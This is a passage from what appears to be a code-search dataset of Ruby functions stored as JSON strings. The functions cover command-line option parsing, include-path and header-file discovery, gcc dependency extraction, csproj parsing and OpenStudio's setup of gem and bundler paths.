end\n\n opt.separator nil\n\n opt.on(\"-D\", \"--[no-]debug\",\n \"Displays lots on internal stuff.\") do |value|\n $DEBUG_RDOC = value\n end\n\n opt.separator nil\n\n opt.on(\"--[no-]ignore-invalid\",\n \"Ignore invalid options and continue\",\n \"(default true).\") do |value|\n ignore_invalid = value\n end\n\n opt.separator nil\n\n opt.on(\"--quiet\", \"-q\",\n \"Don't show progress as we parse.\") do |value|\n @verbosity = 0\n end\n\n opt.separator nil\n\n opt.on(\"--verbose\", \"-V\",\n \"Display extra progress as RDoc parses\") do |value|\n @verbosity = 2\n end\n\n opt.separator nil\n\n opt.on(\"--version\", \"-v\", \"print the version\") do\n puts opt.version\n exit\n end\n\n opt.separator nil\n\n opt.on(\"--help\", \"-h\", \"Display this help\") do\n RDoc::RDoc::GENERATORS.each_key do |generator|\n setup_generator generator\n end\n\n puts opt.help\n exit\n end\n\n opt.separator nil\n end\n\n setup_generator 'darkfish' if\n argv.grep(/\\A(-f|--fmt|--format|-r|-R|--ri|--ri-site)\\b/).empty?\n\n deprecated = []\n invalid = []\n\n begin\n opts.parse! 
argv\n rescue OptionParser::ParseError => e\n if DEPRECATED[e.args.first] then\n deprecated << e.args.first\n elsif %w[--format --ri -r --ri-site -R].include? e.args.first then\n raise\n else\n invalid << e.args.join(' ')\n end\n\n retry\n end\n\n unless @generator then\n @generator = RDoc::Generator::Darkfish\n @generator_name = 'darkfish'\n end\n\n if @pipe and not argv.empty? then\n @pipe = false\n invalid << '-p (with files)'\n end\n\n unless quiet then\n deprecated.each do |opt|\n $stderr.puts 'option ' + opt + ' is deprecated: ' + DEPRECATED[opt]\n end\n end\n\n unless invalid.empty? then\n invalid = \"invalid options: #{invalid.join ', '}\"\n\n if ignore_invalid then\n unless quiet then\n $stderr.puts invalid\n $stderr.puts '(invalid options are ignored)'\n end\n else\n unless quiet then\n $stderr.puts opts\n end\n $stderr.puts invalid\n exit 1\n end\n end\n\n @files = argv.dup\n\n self\n end",
"def flags\n input = @flags.clone\n tok = []\n\n # Set the output path\n throw 'Output pathname is required' if @output.nil?\n if Platform.is_windows?\n tok.push \"/OUT:\\\"#{@output}\\\"\"\n tok.push '/DLL' if @output =~ /\\.dll/i\n else\n tok.push '-o', @output\n end\n\n # Enable shared library output\n if @shared_library\n if Platform.is_windows?\n tok.push '/DLL'\n else\n tok.push '-shared'\n tok.push '-fPIC'\n end\n end\n\n # Assume that we want to link with shared libraries\n # built within this project\n unless Platform.is_windows?\n tok.push '-L', '.'\n end\n\n # Override the normal search path for the dynamic linker\n unless @rpath.nil?\n if Platform.is_solaris?\n input.push ['R', @rpath]\n elsif Platform.is_linux?\n input.push ['-rpath', @rpath]\n elsif Platform.is_windows?\n # XXX-FIXME Windows does not support the rpath concept\n else\n throw 'Unsupported OS'\n end\n input.push ['-L', @rpath]\n end\n\n input.each do |f|\n if @gcc_flags == true\n if f.kind_of?(Array)\n if f[0] == '-L'\n tok.push f.join(' ')\n else\n tok.push '-Wl,' + f[0] + ',' + f[1]\n end\n else\n tok.push '-Wl,' + f\n end\n else\n if f.kind_of?(Array)\n tok.push f.flatten.join(' ')\n else\n tok.push f\n end\n end\n end\n\n res = ' ' + tok.join(' ')\n return res\n end",
"def find_header_file(header)\n filename = nil\n header_include_paths.each do |path|\n maybe_filename = \"#{path}/#{header}\"\n if File.exists?(maybe_filename)\n filename = maybe_filename\n break\n end\n end\n filename\nend",
"def header_files\n @header_files ||= find_files( @header_search_paths, @header_file_extension ).uniq\n @header_files\n end",
"def parse_files\n @parse_files ||=\n begin\n files = expand_dirs_to_files(@path)\n files = file_sort(files)\n\n if @options['only'].present?\n files = file_accept(files, @options['only'])\n end\n\n # By default, tmp, vender, spec, test, features are ignored.\n %w[vendor spec test features tmp].each do |dir|\n files = file_ignore(files, File.join(@path, dir)) unless @options[dir]\n end\n\n # Exclude files based on exclude regexes if the option is set.\n @options['exclude'].each do |pattern|\n files = file_ignore(files, pattern)\n end\n\n %w[Capfile Gemfile Gemfile.lock].each do |file|\n files.unshift File.join(@path, file)\n end\n\n files.compact\n end\n end",
"def parse_opts\n\tif ARGV.empty? then puts \"Usage: ch_find.rb [options] <search_term> <replacement>\\n\"; exit end\n\tOptionParser.new do |opts|\n\t\topts.banner = \"\\nOptions:\"\n\t\topts.on(\"-v\", \"--version\", \"Display the version\") {output_version}\n\t\topts.on(\"-h\", \"--help\", \"Display the help\") {output_help opts}\n\t\topts.on(\"-n\", \"--names\", \"Grep file names only, not contents\") {Opts['names'] = true}\n\t\topts.on(\"-f\", \"--file [FILE]\", \"Act only on a specific file\") {|file| Opts['file'] = file}\n\t\topts.on(\"-e\", \"--exclude [EXTENSIONS]\", \"Exclude specific files types\") {|extensions| Opts['exclude'] = extensions.gsub('.','').gsub(',',' ').split(/\\s/)}\n\t\topts.on(\"-i\", \"--include [EXTENSIONS]\", \"Include specific file types only\") {|extensions| Opts['include'] = extensions.gsub('.','').gsub(',',' ').split(/\\s/)}\n\t\topts.on(\"-r\", \"--replace\", \"Replace param1 with param2\") {Opts['replace'] = true}\n\t\topts.on(\"-d\", \"--dry-run\", \"Print replacements but do not write to disk\") {Opts['dry_run'] = true}\n\tend.parse!\nend",
"def initialize(input_file_name, include_path)\n @input_file_name = input_file_name\n @include_path = include_path\n @options = nil\n end",
"def scanCPPFiles file_param\n\n\tif file_param == nil then return end\n\n\tno_ending = file_param.split(\".\")\n\tif File.exist? \"#{no_ending}.cpp\"\n\t\t$cppObjects.push(no_ending[0])\n\n\t\tf = File.open(\"#{no_ending[0]}.cpp\",\"r\").each_line { |line|\n\n\t\t\tline.scan(/^#include \"(.+)\"$/) do |w|\n\t\t\t\t$files_to_do.push(w)\n\t\t\tend\n\t\t}\n\t\t$files_to_do.flatten!\n\t\t$cppObjects.each do |word|\n\t\t\t$files_to_do.reject! {|repeat| repeat.split(\".\")[0] == word}\n\t\tend\n\tend\n\tif $files_to_do != nil then\n\t\t$files_to_do.uniq!\n\t\tscanCPPFiles $files_to_do.pop\n\tend\n\nend",
"def getHeaderDependencesAbsOrRel(builder, srcfile, print)\n\t\tif print\n\t\t\tputs \"running gcc dependence printer on #{srcfile}\"\n\t\tend\n\t\t\n\t\t#don't need to src2build() the output dir because the builder's dir is already under the build tree\n\t\toutfilename = @tmpdir.join('includes.list') #write to file in case stdout gets muddied by preprocessor errors\n\t\t\n\t\t#gcc -M flag lists included headers; with -M, -MG means assume missing files are generated, and -MF specifies outfilename for header list\n\t\tcmd = \"#{compileCmd(srcfile)} #{@INCDIRS.map {|dirpath| \"-I#{dirpath}\"}.join(' ')} -MF #{outfilename} -M -MG #{srcfile.to_s}\"\n\t\t\n#\t\tputs cmd\n\t\t`#{cmd}`\n\t\tif $?.to_i != 0\n\t\t\traise \"gcc dependence printer found errors; killing rake\"\n\t\telse\n\t\t\tfid = File.open(outfilename)\n\t\t\toutput = fid.map {|line| line.to_s}.join('')\n\t\t\tfid.close()\n\t\t\t`#{$RM} #{outfilename}`\n\t\t\tfilenames = output.gsub(/\\\\\\n/, ' ').gsub(/:\\s+/, ' ').gsub(/([^\\\\])\\s+/, \"\\\\1 \").split(/\\s+/) #regexes specific to gcc-like output\n\t\t\tfilenames.shift; filenames.shift #remove object filename and source filename; rest are headers\n\t\t\treturn filenames\n\t\tend\n\tend",
"def get_include_data(line)\n return IO.read(line.include_file_path) if line.include_file_options.nil?\n\n case line.include_file_options[0]\n when ':lines'\n # Get options\n include_file_lines = line.include_file_options[1].gsub('\"', '').split('-')\n include_file_lines[0] = include_file_lines[0].empty? ? 1 : include_file_lines[0].to_i\n include_file_lines[1] = include_file_lines[1].to_i if !include_file_lines[1].nil?\n\n # Extract request lines. Note that the second index is excluded, according to the doc\n line_index = 1\n include_data = []\n File.open(line.include_file_path, \"r\") do |fd|\n while line_data = fd.gets\n if (line_index >= include_file_lines[0] and (include_file_lines[1].nil? or line_index < include_file_lines[1]))\n include_data << line_data.chomp\n end\n line_index += 1\n end\n end\n\n when 'src', 'example', 'quote'\n # Prepare tags\n begin_tag = '#+BEGIN_%s' % [line.include_file_options[0].upcase]\n if line.include_file_options[0] == 'src' and !line.include_file_options[1].nil?\n begin_tag += ' ' + line.include_file_options[1]\n end\n end_tag = '#+END_%s' % [line.include_file_options[0].upcase]\n\n # Get lines. Will be transformed into an array at processing\n include_data = \"%s\\n%s\\n%s\" % [begin_tag, IO.read(line.include_file_path), end_tag]\n\n else\n include_data = []\n end\n # @todo: support \":minlevel\"\n\n include_data\n end",
"def header_magic(ind, outd)\n dirs = []\n hdrs = []\n\n find_files(ind, /.*\\.h[hxp]*$/) do |p|\n outdir = File.dirname p.sub(ind, outd)\n outfile = File.join(outd, File.basename(p))\n\n directory outdir\n file outfile => p do\n cp_r p, outdir\n end\n dirs.push outdir\n hdrs.push outfile\n CLEAN.include outfile, outdir\n end\n\n dirs+hdrs\nend",
"def includes(options)\n @includes = options\n end",
"def makeIncludesString (dirnames) \n\t\tstr = \"\"\n\t\tdirnames.each do |dirname|\n\t\t\tstr += \" -I \" + dirname\n\t\tend\n\t\treturn str\n\tend",
"def parseopts\n\n opts = OptionParser.new\n opts.on( '-v', '--verbose', \"Run verbosely\" ) { @verbose = true }\n opts.on( '-h', '--help', \"Emit help information\") { @help = true }\n opts.on( '--version', \"Emit version and exit\") { @version = true }\n opts.on( '-n', '--name NAME', \"Array name\" ) { |n| @arrayname = n }\n opts.on( '-t', '--type TYPE', \"Array type\" ) { |t| @arraytype = t }\n opts.on( '-o', '--output FILE', 'Output file name' ) { |f| @outfile = f\n $stdout.reopen(f, \"w\")}\n opts.on( '-p', '--[no-]preamble', \"No file header\" ) { |n| @preamble = n }\n\n opts.banner =<<-end.gsub(/^ {6}/, '')\n Translates the contents of any file to a C array.\n\n Usage: #{@appname} [options] [filename]\n\n Options:\n end\n\n\n opts.separator <<-notes.gsub(/^ {6}/, '')\n\n Examples:\n #{@appname} -o output.cpp foo.bin\n #{@appname} -o header.h foo.bin\n #{@appname} -v <foo.bin >output.cpp\n #{@appname} --no-preamble -o output.cpp <foo.bin\n #{@appname} --type \\\"uint8_t\\\" <foo.bin >output.cpp\n\n notes\n\n begin\n opts.parse!\n\n rescue Exception => e\n puts e, opts\n exit\n end\n\n if @version\n puts @verstring\n exit 0\n\n elsif @help\n puts opts\n exit 0\n end\n\n\n # if no arrayname specified, use\n # infile name. If infile is\n # stdin, use default.\n\n if @arrayname == \"\"\n fname = ARGF.filename\n\n if fname == \"-\" # stdin\n fname = \"binary_data\"\n end\n\n @arrayname = fname.chomp(File.extname(fname))\n end\n\n\n if @verbose\n warn <<-end.gsub(/^ {8}/, '')\n appname = #{File.basename $0}\n verstring = #{@appname} #{BIN2CVER}\n time = #{@time}\n verbose = #{@verbose}\n help = #{@help}\n version = #{@version}\n arrayname = #{@arrayname}\n arraytype = #{@arraytype}\n infile = #{ARGF.filename}\n outfile = #{@outfile}\n preamble = #{@preamble}\n\n end\n end\n end",
"def include(*files)\n fail \"AchiveTask.include() called with nil values\" if files.include? nil\n @paths[''].include *files if files.compact.size > 0\n self\n end",
"def include(*files)\n @include += files.flatten\n self\n end",
"def add_includes out, includes\n return if includes.empty?\n out << RDoc::Markup::Rule.new(1)\n out << RDoc::Markup::Heading.new(1, \"Includes:\")\n includes.each do |modules, store|\n if modules.length == 1 then\n include = modules.first\n name = include.name\n path = store.friendly_path\n out << RDoc::Markup::Paragraph.new(\"#{name} (from #{path})\")\n if include.comment then\n out << RDoc::Markup::BlankLine.new\n out << include.comment\n end\n else\n out << RDoc::Markup::Paragraph.new(\"(from #{store.friendly_path})\")\n wout, with = modules.partition { |incl| incl.comment.empty? }\n out << RDoc::Markup::BlankLine.new unless with.empty?\n with.each do |incl|\n out << RDoc::Markup::Paragraph.new(incl.name)\n out << RDoc::Markup::BlankLine.new\n out << incl.comment\n end\n unless wout.empty? then\n verb = RDoc::Markup::Verbatim.new\n wout.each do |incl|\n verb.push incl.name, \"\\n\"\n end\n out << verb\n end\n end\n end\n end",
"def ready\n includes = @options.includes\n unless Array === includes\n error \"Invalid value for @options.includes: #{includes.inspect}\"\n end\n includes.each do |dir|\n $:.unshift dir\n end\n end",
"def search_filenames\n # * => all files\n # r => search from its subdirectories\n # i => ignore cases\n # l => list file name\n # c => show word occurence count\n # w => words\n\n args = set_args\n # grep -ril '#keyword1' --include=\\*.rb *\n `grep -ril '#{args}' #{search_extension} *`\n end",
"def load_file_path!\n @files = FilepathScanner.call(\n include_paths,\n exclude_path_regexps,\n recursive_scan: recursive_include\n )\n end",
"def option_search_all(options)\n if(directory = options[:in_dir])\n search_in(:directory => directory, :for_files => search_all_files)\n else\n search_all_files\n end\n end",
"def search(options)\n result = case options\n when MatchData\n options.to_s\n when Hash\n if options.include?(:all)\n option_search_all(options).join(' ')\n else\n search_file_with_pattern(:pattern => options[:test_for][1], :in_dir => options[:in_dir])\n end\n end\n end",
"def parse_args(*args)\n if args.size == 0\n args = [File.expand_path('.')]\n end\n\n @files = []\n args.each do |file|\n next unless File.exists?(file)\n file = File.expand_path(file)\n\n # If target is a dir, we add all music files in this dir\n if File.directory?(file)\n @files += Dir.glob(File.join(file, '**', '*.{mp3,ogg}')).map{|i| File.expand_path(i)}.sort\n else\n @files << file\n end\n end\n end",
"def in_source_dir(*paths); end",
"def all(options = {:activated => true, :detailed => true, :files => ['^app/(.*)\\.rb', '^lib/(.*)\\.rb']})\n @options.each do |option|\n option ||= {}\n option << options\n end\n end",
"def add(glob, options)\n definition << options.merge(:glob => glob)\n end",
"def includes(*paths)\n @includes.concat(paths) unless paths.empty?\n @includes\n end",
"def do_includes\n @body.scan(/rb_include_module\\s*\\(\\s*(\\w+?),\\s*(\\w+?)\\s*\\)/) do |c,m|\n if cls = @classes[c]\n m = @known_classes[m] || m\n cls.add_include(Include.new(m, \"\"))\n end\n end\n end",
"def initialize file, include_path\n @file = file\n @include_path = include_path\n end",
"def have_header(header, *directories)\n erb = ERB.new(read_template('have_header.erb'))\n code = erb.result(binding)\n\n if directories.empty?\n options = nil\n else\n options = ''\n directories.each{ |dir| options += \"-I#{dir} \" }\n options.rstrip!\n end\n\n try_to_compile(code, options)\n end",
"def option_list\n result = @options.dup\n result << \"-o\" << @rdoc_dir\n result << \"--main\" << main if main\n result << \"--markup\" << markup if markup\n result << \"--title\" << title if title\n result << \"-T\" << template if template\n result << '-f' << generator if generator\n result\n end",
"def parse(header_file, to_file)\n includes = @includes.flatten.uniq.map {|i| \"-I#{i.chomp}\"}.join(\" \").chomp\n flags = @flags.flatten.join(\" \").chomp\n flags += \" -Wno-unused-command-line-argument --castxml-cc-gnu #{find_clang} --castxml-gccxml\"\n\n exe = find_exe.strip.chomp\n cmd = \"#{exe} #{includes} #{flags} -o #{to_file} #{header_file}\"\n raise \"Error executing castxml command line: #{cmd}\" unless system(cmd)\n end",
"def setup_options(args)\n\toptions = {:output_dir => \"./merged_sam\",\n\t\t\t :sample_name => \"\"}\n\n\topt_parser = OptionParser.new do |opts|\n\t\topts.banner = \"Usage: multiple_sam_files.rb [options] sam_file*\"\n\t\topts.separator \"\"\n\t\n\t\topts.on(\"-o\", \"--output_dir [DIR]\", :REQUIRED, String, \"Root directory for the results (default: ./merged_sam)\" ) do |o|\n\t\t\toptions[:output_dir] = o\n\t\tend\n\t\n\t\topts.on(\"-n\", \"--sample_name\", :REQUIRED, String, \"Sample name of the merged SAM file\" ) do |n|\n\t\t\toptions[:sample_name] = n\n\t\tend\n\t\n\t\topts.on(\"-d\", \"--debug\", \"Run in debug mode\") do |d|\n\t\t\toptions[:log_level] = \"debug\"\n\t\tend\n\t\n\t\topts.on_tail(\"-h\", \"--help\", \"Show this message\") do\n\t\t\tputs opts\n\t\t\texit\n\t\tend\n\tend\n\t\n\targs = [\"-s\"] if args.length == 0\n\topt_parser.parse!(args)\n\traise \"Please specify sam_files\" if args.length == 0\n\toptions\nend",
"def add_includes out, includes\n add_extension_modules out, 'Includes', includes\n end",
"def final_options(library, paths); end",
"def initialize(lines, parser_options={ })\n if lines.is_a? Array then\n @lines = lines\n elsif lines.is_a? String then\n @lines = lines.split(\"\\n\")\n else\n raise \"Unsupported type for +lines+: #{lines.class}\"\n end\n\n @custom_keywords = []\n @headlines = Array.new\n @current_headline = nil\n @header_lines = []\n @in_buffer_settings = { }\n @options = { }\n @link_abbrevs = { }\n @parser_options = parser_options\n\n #\n # Include file feature disabled by default since \n # it would be dangerous in some environments\n #\n # http://orgmode.org/manual/Include-files.html\n #\n # It will be activated by one of the following:\n #\n # - setting an ORG_RUBY_ENABLE_INCLUDE_FILES env variable to 'true'\n # - setting an ORG_RUBY_INCLUDE_ROOT env variable with the root path\n # - explicitly enabling it by passing it as an option:\n # e.g. Orgmode::Parser.new(org_text, { :allow_include_files => true })\n #\n # IMPORTANT: To avoid the feature altogether, it can be _explicitly disabled_ as follows:\n # e.g. Orgmode::Parser.new(org_text, { :allow_include_files => false })\n #\n if @parser_options[:allow_include_files].nil?\n if ENV['ORG_RUBY_ENABLE_INCLUDE_FILES'] == 'true' \\\n or not ENV['ORG_RUBY_INCLUDE_ROOT'].nil?\n @parser_options[:allow_include_files] = true\n end\n end\n\n @parser_options[:offset] ||= 0\n\n parse_lines @lines\n end",
"def included_files; end",
"def get_header_fns\n fns = {}\n basename = File.basename(@parts[:fn], @parts[:ext]) + Cpp::get_header_ext(@parts[:ext])\n ['src', 'inc'].each do |type|\n fns[type] = File.join(@parts[:base_dir],\n @parts[:module],\n type,\n @parts[:namespaces],\n basename)\n end\n fns\n end",
"def findopts\n [{ option: :atime,\n flag: '-atime',\n value: 'n[smhdw]',\n validate: validate_time,\n description: 'Access time.'\n },\n { option: :depth,\n flag: '-depth',\n value: 'n',\n validate: validate_number,\n description: 'Depth relative to the starting point.'\n },\n { option: :iname,\n flag: '-iname',\n value: '[pattern]',\n description: 'Path matches pattern (case insensitive).'\n },\n { option: :ipath,\n flag: '-ipath',\n value: '[pattern]',\n description: 'Path matches pattern (case insensitive).'\n },\n { option: :maxdepth,\n flag: '-maxdepth',\n value: 'n',\n validate: validate_nonnegative,\n description: 'Descend at most n directory levels.'\n },\n { option: :mindepth,\n flag: '-mindepth',\n value: 'n',\n validate: validate_nonnegative,\n description: 'Descend at least n directory levels.'\n },\n { option: :minsize,\n flag: '-minsize',\n value: 'n',\n validate: validate_unsigned_numeric,\n description: 'Prunes find expression to objects of a minimum size.'\n },\n { option: :mindsize,\n flag: '-mindirsize',\n value: 'n',\n validate: validate_unsigned_numeric,\n description: 'Prunes find expression to directories of a minimum size.'\n },\n { option: :mtime,\n flag: '-mtime',\n value: 'n[smhdw]',\n validate: validate_time,\n description: 'Modification time.'\n },\n { option: :name,\n flag: '-name',\n value: '[pattern]',\n description: 'Name (last component of the path) matches pattern.'\n },\n { option: :path,\n flag: '-path',\n value: '[pattern]',\n description: 'Path matches pattern.'\n },\n { option: :print,\n flag: '-print',\n description: 'Print the pathname.'\n },\n { option: :ls,\n flag: '-ls',\n description: 'Print ls-style information.'\n },\n { option: :size,\n flag: '-size',\n value: 'n[ckMGTP]',\n validate: validate_numeric,\n description: 'File size.'\n }\n ]\n end",
"def list_files(options = {}) \n options = DEFAULTS.merge(options)\n\n path = options[:path]\n all = options[:all]\n extension = options[:extension]\n\n extension = \".#{extension}\" unless extension == '' or extension.start_with?('.') \n file_wildcard = \"*#{extension}\"\n\n path = \"#{path}/\" unless path == '' or path.end_with?('/')\n path = path+'**/' if all \n\n Dir.glob(\"#{path}#{file_wildcard}\")\n end",
"def packages_providing_header(header)\n packages_providing(\"*/usr/include/#{header}\")\nend",
"def parse_options\n @opts = Slop.parse do |o| \n o.string '-f1', '--file1', 'First source file'\n o.string '-f2', '--file2', 'Second source file'\n o.on '-v', '--version' do\n puts Slop::VERSION\n end\n end\n rescue Exception => e\n raise\n end",
"def parse_files(files, opts = {})\n opts = { :extension => nil, :directory => nil }.merge opts\n files = [files] unless files.is_a?(Array)\n search_text = files.join(\" \")\n parsed_files = []\n while !files.empty?\n file = files.shift\n unless opts[:directory].nil?\n file = opts[:directory] + \"/\" + file\n end\n unless opts[:extension].nil?\n file = file.sub(/\\.[^\\\\\\/]*$/, \"\") + \".\" + opts[:extension].to_s.tr(\".\", \"\")\n end\n parsed_files += Dir.glob(File.expand_path(file))\n end\n puts I18n.t(:no_match) % search_text if parsed_files.empty?\n parsed_files.uniq\n end",
"def search_in(options)\n files = options[:for_files]\n directory = options[:directory]\n if directory\n dir_files = files_in_directory(directory)\n files.select { |file| dir_files.include?(file) }\n else\n files\n end\n end",
"def find_options options={}\r\n con = conditions\r\n par = parameters\r\n inc = includes\r\n cond_ary = nil\r\n if conditions\r\n cond_ary=[con]\r\n cond_ary += par if par\r\n end\r\n options[:conditions] = cond_ary if cond_ary\r\n options[:include] = includes if includes\r\n options \r\n end",
"def included\n return [] if directory.empty? || directory == '*'\n @included ||= process_globs(@raw_data['include'])\n end",
"def parse_csproj(filename, options={})\n lines = []\n\n if File.exists?(filename)\n File.open(filename, \"r\") do |file|\n doc = Nokogiri::XML(file)\n\n unless options[:skip_source]\n # source files\n doc.css('Compile').each do |element|\n name = element.attr(\"Include\")\n name = name.gsub(/\\\\/, \"/\") if posix?\n say_status \"SOURCE\", name, :green\n lines << \"'#{name}'\"\n end\n end\n\n # explicitly hinted dll paths\n doc.css('HintPath').each do |element|\n name = element.children.text.chomp\n say_status \"DLL\", name, :green\n lines << \"-r:'#{name}'\"\n end\n\n # compiler defines\n doc.css('DefineConstants').each do |element|\n name = element.children.text.chomp\n name.split(/;/).each do |define|\n say_status \"DEFINE\", define, :green\n lines << \"-define:'#{define}'\"\n end\n end\n end\n end\n\n lines\n end",
"def parse_main_args(main_args)\n\n $logger.debug \"Parsing main_args #{main_args}\"\n\n # verbose already handled\n main_args.delete('--verbose')\n\n # Operate on the include option to add to $LOAD_PATH\n remove_indices = []\n new_path = []\n main_args.each_index do |i|\n\n if main_args[i] == '-I' || main_args[i] == '--include'\n # remove from further processing\n remove_indices << i\n remove_indices << i+1\n\n dir = main_args[i + 1]\n\n if dir.nil?\n $logger.error \"#{main_args[i]} requires second argument DIR\"\n return false\n elsif !File.exists?(dir) || !File.directory?(dir)\n # DLM: Ruby doesn't warn for this\n #$logger.warn \"'#{dir}' passed to #{main_args[i]} is not a directory\"\n end\n new_path << dir\n elsif main_args[i] == '--no-ssl'\n $logger.warn \"'--no-ssl' flag is deprecated\"\n end\n end\n\n remove_indices.reverse_each {|i| main_args.delete_at(i)}\n\n if !new_path.empty?\n\n new_path = new_path.concat($LOAD_PATH)\n\n $logger.info \"Setting $LOAD_PATH to #{new_path}\"\n $LOAD_PATH.clear\n\n new_path.each {|p| $LOAD_PATH << p}\n end\n\n # Operate on the gem_path option to set GEM_PATH\n remove_indices = []\n new_path = []\n main_args.each_index do |i|\n\n if main_args[i] == '--gem_path'\n\n # remove from further processing\n remove_indices << i\n remove_indices << i+1\n\n dir = main_args[i + 1]\n\n if dir.nil?\n $logger.error \"#{main_args[i]} requires second argument DIR\"\n return false\n elsif !File.exists?(dir) || !File.directory?(dir)\n # DLM: Ruby doesn't warn for this\n #$logger.warn \"'#{dir}' passed to #{main_args[i]} is not a directory\"\n end\n new_path << dir\n end\n end\n remove_indices.reverse_each {|i| main_args.delete_at(i)}\n\n if !new_path.empty?\n if ENV['GEM_PATH']\n new_path << ENV['GEM_PATH'].to_s\n end\n\n new_path = new_path.join(File::PATH_SEPARATOR)\n\n $logger.info \"Setting GEM_PATH to #{new_path}\"\n ENV['GEM_PATH'] = new_path\n end\n\n # Operate on the gem_home option to set GEM_HOME\n if main_args.include? '--gem_home'\n option_index = main_args.index '--gem_home'\n path_index = option_index + 1\n new_home = main_args[path_index]\n main_args.slice! path_index\n main_args.slice! main_args.index '--gem_home'\n\n $logger.info \"Setting GEM_HOME to #{new_home}\"\n ENV['GEM_HOME'] = new_home\n end\n\n # Operate on the bundle option to set BUNDLE_GEMFILE\n use_bundler = false\n if main_args.include? '--bundle'\n option_index = main_args.index '--bundle'\n path_index = option_index + 1\n gemfile = main_args[path_index]\n main_args.slice! path_index\n main_args.slice! main_args.index '--bundle'\n\n $logger.info \"Setting BUNDLE_GEMFILE to #{gemfile}\"\n ENV['BUNDLE_GEMFILE'] = gemfile\n use_bundler = true\n\n elsif ENV['BUNDLE_GEMFILE']\n # no argument but env var is set\n $logger.info \"ENV['BUNDLE_GEMFILE'] set to '#{ENV['BUNDLE_GEMFILE']}'\"\n use_bundler = true\n\n end\n\n if main_args.include? '--bundle_path'\n option_index = main_args.index '--bundle_path'\n path_index = option_index + 1\n bundle_path = main_args[path_index]\n main_args.slice! path_index\n main_args.slice! 
main_args.index '--bundle_path'\n\n $logger.info \"Setting BUNDLE_PATH to #{bundle_path}\"\n ENV['BUNDLE_PATH'] = bundle_path\n\n elsif ENV['BUNDLE_PATH']\n # no argument but env var is set\n $logger.info \"ENV['BUNDLE_PATH'] set to '#{ENV['BUNDLE_PATH']}'\"\n\n elsif use_bundler\n # bundle was requested but bundle_path was not provided\n $logger.warn \"Bundle activated but ENV['BUNDLE_PATH'] is not set\"\n\n $logger.info \"Setting BUNDLE_PATH to ':/ruby/2.7.0/'\"\n ENV['BUNDLE_PATH'] = ':/ruby/2.7.0/'\n\n end\n\n if main_args.include? '--bundle_without'\n option_index = main_args.index '--bundle_without'\n path_index = option_index + 1\n bundle_without = main_args[path_index]\n main_args.slice! path_index\n main_args.slice! main_args.index '--bundle_without'\n\n $logger.info \"Setting BUNDLE_WITHOUT to #{bundle_without}\"\n ENV['BUNDLE_WITHOUT'] = bundle_without\n\n elsif ENV['BUNDLE_WITHOUT']\n # no argument but env var is set\n $logger.info \"ENV['BUNDLE_WITHOUT'] set to '#{ENV['BUNDLE_WITHOUT']}'\"\n\n elsif use_bundler\n # bundle was requested but bundle_path was not provided\n $logger.warn \"Bundle activated but ENV['BUNDLE_WITHOUT'] is not set\"\n\n # match configuration in build_openstudio_gems\n $logger.info \"Setting BUNDLE_WITHOUT to 'test'\"\n ENV['BUNDLE_WITHOUT'] = 'test'\n\n # ignore any local config on disk\n #DLM: this would be correct if the bundle was created here\n #it would not be correct if the bundle was transfered from another computer\n #ENV['BUNDLE_IGNORE_CONFIG'] = 'true'\n Gem.paths.path << ':/ruby/2.2.0/bundler/gems/'\n\n end\n\n Gem.paths.path << ':/ruby/2.7.0/gems/'\n Gem.paths.path << ':/ruby/2.7.0/bundler/gems/'\n\n # find all the embedded gems\n original_embedded_gems = {}\n\n # Add the gem spec paths. This filepath name gets appended with 'specification' \n # This will trigger Gem to reload all gems in these paths. 
\n Gem::Specification.dirs=( [\":/ruby/2.7.0\", \":/ruby/2.7.0/gems\", \":/ruby/2.7.0/bundler/gems\" ] ) \n \n # activate or remove bundler\n Gem::Specification.each do |spec|\n if spec.gem_dir.chars.first == ':'\n if spec.name == 'bundler'\n if use_bundler\n spec.activate\n else\n # DLM: don't remove, used by Resolver\n #Gem::Specification.remove_spec(spec)\n end\n end\n end\n end\n\n if use_bundler\n\n current_dir = Dir.pwd\n\n original_arch = nil\n if RbConfig::CONFIG['arch'] =~ /x64-mswin64/\n # assume that system ruby of 'x64-mingw32' architecture was used to create bundle\n original_arch = RbConfig::CONFIG['arch']\n $logger.info \"Temporarily replacing arch '#{original_arch}' with 'x64-mingw32' for Bundle\"\n RbConfig::CONFIG['arch'] = 'x64-mingw32'\n end\n\n\n\n # require bundler\n # have to do some forward declaration and pre-require to get around autoload cycles\n require 'bundler/errors'\n #require 'bundler/environment_preserver'\n require 'bundler/plugin'\n #require 'bundler/rubygems_ext'\n require 'bundler/rubygems_integration'\n require 'bundler/version'\n require 'bundler/ruby_version'\n #require 'bundler/constants'\n #require 'bundler/current_ruby'\n require 'bundler/gem_helpers'\n #require 'bundler/plugin'\n require 'bundler/source'\n require 'bundler/definition'\n require 'bundler/dsl'\n require 'bundler/uri_credentials_filter'\n require 'bundler'\n\n begin\n # activate bundled gems\n # bundler will look in:\n # 1) ENV[\"BUNDLE_GEMFILE\"]\n # 2) find_file(\"Gemfile\", \"gems.rb\")\n #require 'bundler/setup'\n\n groups = Bundler.definition.groups\n keep_groups = []\n without_groups = ENV['BUNDLE_WITHOUT']\n $logger.info \"without_groups = #{without_groups}\"\n groups.each do |g|\n $logger.info \"g = #{g}\"\n if without_groups.include?(g.to_s)\n $logger.info \"Bundling without group '#{g}'\"\n else\n keep_groups << g\n end\n end\n\n $logger.info \"Bundling with groups [#{keep_groups.join(',')}]\"\n\n remaining_specs = []\n Bundler.definition.specs_for(keep_groups).each {|s| remaining_specs << s.name}\n\n $logger.info \"Specs to be included [#{remaining_specs.join(',')}]\"\n\n Bundler.setup(*keep_groups)\n #Bundler.require(*keep_groups)\n\n #rescue Bundler::BundlerError => e\n\n #$logger.info e.backtrace.join(\"\\n\")\n #$logger.error \"Bundler #{e.class}: Use `bundle install` to install missing gems\"\n #exit e.status_code\n\n ensure\n\n if original_arch\n $logger.info \"Restoring arch '#{original_arch}'\"\n RbConfig::CONFIG['arch'] = original_arch\n end\n\n Dir.chdir(current_dir)\n end\n\n else\n # not using_bundler\n\n current_dir = Dir.pwd\n\n begin\n # DLM: test code, useful for testing from command line using system ruby\n #Gem::Specification.each do |spec|\n # if /openstudio/.match(spec.name)\n # original_embedded_gems[spec.name] = spec\n # end\n #end\n\n # get a list of all the embedded gems\n dependencies = []\n original_embedded_gems.each_value do |spec|\n $logger.debug \"Adding dependency on #{spec.name} '~> #{spec.version}'\"\n dependencies << Gem::Dependency.new(spec.name, \"~> #{spec.version}\")\n end\n #dependencies.each {|d| $logger.debug \"Added dependency #{d}\"}\n\n # resolve dependencies\n activation_errors = false\n original_load_path = $:.clone\n resolver 